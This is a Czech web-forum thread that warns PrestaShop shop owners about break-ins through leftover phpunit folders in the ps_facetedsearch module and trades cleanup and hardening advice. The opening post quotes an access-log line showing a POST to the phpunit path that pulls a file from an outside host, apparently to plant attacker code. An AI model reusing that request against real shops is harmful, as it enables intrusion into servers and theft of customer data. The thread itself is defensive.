Zadejte hledaný výraz...
Sledujte nás
facebook youtube
user
user

[VAROVÁNÍ] PrestaShop modul ps_facetedsearch

webzakazky
verified
rating uzivatele
(39 hodnocení)
5. 5. 2020 08:25:25
V poslední době jsem zaznamenal a čistil několik eshopů od brutálních entry point útoků přes modul ps_facetedsearch.
Rozesílají spamy ve velkém.
Jde to z více stránek.
Ukázka jak se krásně dostanou ke všem vašim souborům:
"POST /modules/ps_facetedsearch/vendor/phpunit/
phpunit/src/Util/Log/JSUnit.php?
php=http://supercornerelectronics.com/1/up.txt HTTP/1.1" 200 326
Projděte si všechny moduly a odstraňte složky phpunit.
Pokud byl již váš eshop napaden, bude nutná čistá instalace, změna přístupů do databáze a nová konfigurace eshopu.
V žádném případě nekopíruje do čisté instalace původní soubory. Může být v nich již zapsána metoda GET nebo POST.
Aktualizujete zejména PrestaShop 1.6, 1.7.0 až 1.7.6 !!!
5. 5. 2020 08:25:25
https://webtrh.cz/diskuse/varovani-prestashop-modul-ps_facetedsearch/#reply1450872
TomasX
verified
rating uzivatele
(4 hodnocení)
5. 5. 2020 08:37:08
panejo, phpunit nemá nikdy co dělat v produkčním sestavení. To je dobré info.
Proti těmhle věcem používám FW, nedovolím php aplikaci libilovolně komunikovat s internetem, jen na whitelist domén/ip adres, radikálně se pak snížil vektor napadaní i děravách systémů, stejně kritické jsou zápisy do vlastních útrob (aktualizace jsou paradoxně nějvětší bezpečnostní riziko), řešení je odděleným uživatalem pro php na aktualizace.
Hostingy zatím moc takovýhle bezpečnostních vrstev nenabízejí, což mě podivuje, vidím jen skenování. Většina adminů to zase není schopná nastavit, selinud automaticky vypínají misto, aby vyladili pravidla.
Bohužel někteří klienti chtějí wordpress nebo prestu, takže se občas musím do vnitřností položit a nějak tomu hodit bezpečnou pozlátku. Bylo by super, kdyby to dělalo více firem.
5. 5. 2020 08:37:08
https://webtrh.cz/diskuse/varovani-prestashop-modul-ps_facetedsearch/#reply1450871
webeshop
verified
rating uzivatele
(3 hodnocení)
5. 5. 2020 11:29:15
Je to relativně starší záležitost, ale věřím, že na mnoha eshopech to není vyřešeno...
Oficiální info:
Critical security vulnerability in PrestaShop modules | PrestaShop Developers’…
5. 5. 2020 11:29:15
https://webtrh.cz/diskuse/varovani-prestashop-modul-ps_facetedsearch/#reply1450870
webzakazky
verified
rating uzivatele
(39 hodnocení)
5. 5. 2020 15:09:05
No právě.
Než dát pár set korun za odborně provedený upgrade, tak raději pár tisíc za kompletní čistou instalaci .....
Eshopů na starších verzích běží mnoho.
Dnes je moderní používat scraping pro vytáhnutí cen konkurence a také vykrádání databází k získání zákaznických účtů. A jsme u jádra věci. Hodně zákazníků používá pro lepší zapamatování stejná hesla a už to jede.
5. 5. 2020 15:09:05
https://webtrh.cz/diskuse/varovani-prestashop-modul-ps_facetedsearch/#reply1450869
Pro odpověď se přihlašte.
Přihlásit

user
Prodej Více

🩺 Na prodej: Zdravotní web ToZdravi.cz – schválený pro AdSense, připravený vydělávat
2 999 Kč
0 příhozů
obhajce.cz
12 000 Kč
0 příhozů
Metaverze.cz – doména na prodej
2 000 Kč
0 příhozů
LevnyObchod.cz – 20 let stará doména s DR 28 na prodej
15 000 Kč
0 příhozů
ADULT WEB S UMĚLOU INTELIGENCÍ 🤖 – VYBUDUJTE SI PASIVNÍ PŘÍJEM 💸
19 999 Kč
0 příhozů

user
Poptávky Více

Poptávám design pro shopify eshop
Hledáme člověka s výbornou angličtinou na krátký online hovor (10–15 min)
Poptávám: vývoj jazykové aplikace
Mám záujem o instagram followers
Java/Angular – oprava webu

user
Pracovní nabídky Více

React vývojář
Práce z domu
SRE Linux Admin
Práce z domu, Praha
Java Developer
Práce z domu, Praha
Cloud Specialist
Práce z domu
IT Technik

user
Nabídky Více

Grafička k Vašim službám – logo, tiskoviny, sociální sítě, webdesign
🔥 Akční nabídka webových stránek od ElemIT – platí do 31.12.2025 🔥
Senior Software Developer
⚡Tvořím LEVNÉ a PROFESIONÁLNÍ WWW stránky (od 3.999,-Kč)⚡
🚀 Chceš vlastní web zdarma na vyzkoušení?